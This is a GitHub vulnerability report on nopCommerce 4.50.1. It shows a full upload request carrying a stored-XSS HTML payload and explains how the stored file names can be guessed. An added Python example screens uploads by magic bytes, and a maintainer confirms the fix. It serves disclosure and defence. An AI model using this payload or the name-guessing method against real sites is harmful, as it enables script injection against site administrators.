
Unrestricted File Upload in Apply for vendor account feature #6192

Closed
trungtin1998 opened this issue Mar 20, 2022 · 1 comment
@trungtin1998

nopCommerce version: 4.50.1

Steps to reproduce the problem:

  • In the Apply for vendor account feature, a customer can upload an arbitrary file, for example the file script.html; the content of the submitted form is as below:
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Name"

pentester
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Email"

phamtrungtintf1512@gmail.com
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="Description"

Unrestricted File Upload in Apply for vendor account feature
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="uploadedFile"; filename="script.html"
Content-Type: text/html

<h1>Testing upload file by TF1T<img src=x onerror=alert(document.domain)></h1>
-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="apply-vendor"


-----------------------------353170076619137176562598160618
Content-Disposition: form-data; name="__RequestVerificationToken"

CfDJ8PCrMQQMCTdOtvWnrq2WpITJLfTjickNjSm_qcSluUiK-_7c-VbzzTCok-M1duwMopvVKCMTy1GmrmTtQnch6SHfSXemzptzz2nOOP8uW4X6qGD2Z-1lPLct2WQrWDBY1qV5aGgzwe2T_2BneJo-5FzzMeW1b0o9epdkZ_hZpu-4UqN6zwTaxYTx-gFvJBoFaw
-----------------------------353170076619137176562598160618--
  • After the admin views the vendor application by clicking the Edit button, the uploaded file is generated, and the final uploaded file is named in the format /images/thumbs/{id-Vendor.Name-100.Content-Type-extension}
    [screenshot: vendor_list]
    • The id parameter is a 7-digit number and it is auto-incremented, therefore it is easy to guess/brute-force
    • Special characters in the user-input Vendor.Name are filtered, therefore I just put alphabetic characters here to keep the output unchanged
    • Content-Type is text/html => Content-Type-extension is html.
  • One of my final uploaded files is https://IP/images/thumbs/0000108_pentester_100.html
    Impact: Unrestricted File Upload in Apply for vendor account feature leading to Stored XSS
    [screenshot: Unrestricted_file_upload-vendor_apply_XSS]
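Added example, not part of this issue and not nopCommerce's own code: a Python sketch of the server-side screening the report points at. It parses a constructed multipart body in the same shape as the request above, then decides the stored extension from the file's magic bytes rather than from the client-supplied Content-Type, rejects anything that is not an allow-listed image, and picks a random stored name instead of a name built from the auto-increment id and the vendor name. The boundary value, the function names, the size limit and the sample bodies are all constructed for this example.

```python
import secrets
from email.parser import BytesParser
from email.policy import default

# Allow-listed image types keyed by magic bytes. The stored extension comes
# from this table, never from the client's filename or Content-Type header.
IMAGE_SIGNATURES = {
    b"\xff\xd8\xff": "jpg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 2 * 1024 * 1024  # constructed limit for the example

# Constructed boundary; the real request in the report uses a browser-generated one.
BOUNDARY = "---------------------------constructedboundary0001"


def build_form(vendor_name, filename, content_type, file_bytes):
    """Assemble a multipart/form-data body shaped like the report's request (constructed sample)."""
    delim = f"--{BOUNDARY}".encode()
    return (
        delim + b"\r\n"
        + b'Content-Disposition: form-data; name="Name"\r\n\r\n'
        + vendor_name.encode() + b"\r\n"
        + delim + b"\r\n"
        + f'Content-Disposition: form-data; name="uploadedFile"; filename="{filename}"\r\n'.encode()
        + f"Content-Type: {content_type}\r\n\r\n".encode()
        + file_bytes + b"\r\n"
        + delim + b"--\r\n"
    )


def parse_multipart(body, boundary):
    """Split a multipart body into {field name: (filename, content_type, payload bytes)}.

    The stdlib email parser does the MIME framing; the raw body is wrapped in a
    synthetic Content-Type header so the parser knows the boundary.
    """
    wrapped = (
        f'Content-Type: multipart/form-data; boundary="{boundary}"\r\n\r\n'.encode()
        + body
    )
    msg = BytesParser(policy=default).parsebytes(wrapped)
    fields = {}
    for part in msg.iter_parts():
        name = part.get_param("name", header="content-disposition")
        fields[name] = (
            part.get_filename(),            # client-supplied, untrusted
            part.get_content_type(),        # client-supplied, untrusted
            part.get_payload(decode=True),  # the bytes the decision rests on
        )
    return fields


def detect_image_extension(data):
    """Return the allow-listed extension matching the file's magic bytes, or None."""
    for magic, ext in IMAGE_SIGNATURES.items():
        if data.startswith(magic):
            return ext
    return None


def screen_upload(filename, content_type, data):
    """Decide whether an uploaded file may be stored.

    Returns (accepted, detail): on success detail is the server-chosen stored
    name, otherwise the rejection reason. filename and content_type only feed
    the reason string; the decision is made on the bytes.
    """
    if not data or len(data) > MAX_UPLOAD_BYTES:
        return False, "empty or oversized upload"
    ext = detect_image_extension(data)
    if ext is None:
        return False, f"rejected {filename!r} ({content_type}): not an allow-listed image"
    # Random stored name: nothing derivable from the vendor id or name, so the
    # URL cannot be predicted from an auto-increment counter.
    return True, f"{secrets.token_hex(16)}.{ext}"


def screen_vendor_application(body, boundary=BOUNDARY, file_field="uploadedFile"):
    """Parse the application form and screen its file part; no file is acceptable."""
    fields = parse_multipart(body, boundary)
    if file_field not in fields:
        return True, "no file uploaded"
    return screen_upload(*fields[file_field])


# Constructed samples: an HTML document mislabelled as a PNG, and a PNG mislabelled as HTML.
CONSTRUCTED_HTML_BODY = build_form(
    "pentester", "script.html", "image/png", b"<h1>constructed html body</h1>"
)
CONSTRUCTED_PNG_BODY = build_form(
    "pentester", "logo.html", "text/html", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
)
```

The two constructed samples show the point of deciding on bytes rather than headers: the HTML file is rejected even though the form claims image/png, and the real PNG is stored with a .png extension even though the form claims text/html. Serving the upload directory with X-Content-Type-Options: nosniff and, ideally, from a separate origin limits the damage if a non-image ever gets through; that is general practice and is not something this example knows about the project's fix commit.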
@skoshelev
Contributor

Hi @trungtin1998. Thank you for your help. We fixed this issue by this commit

Closed #6192
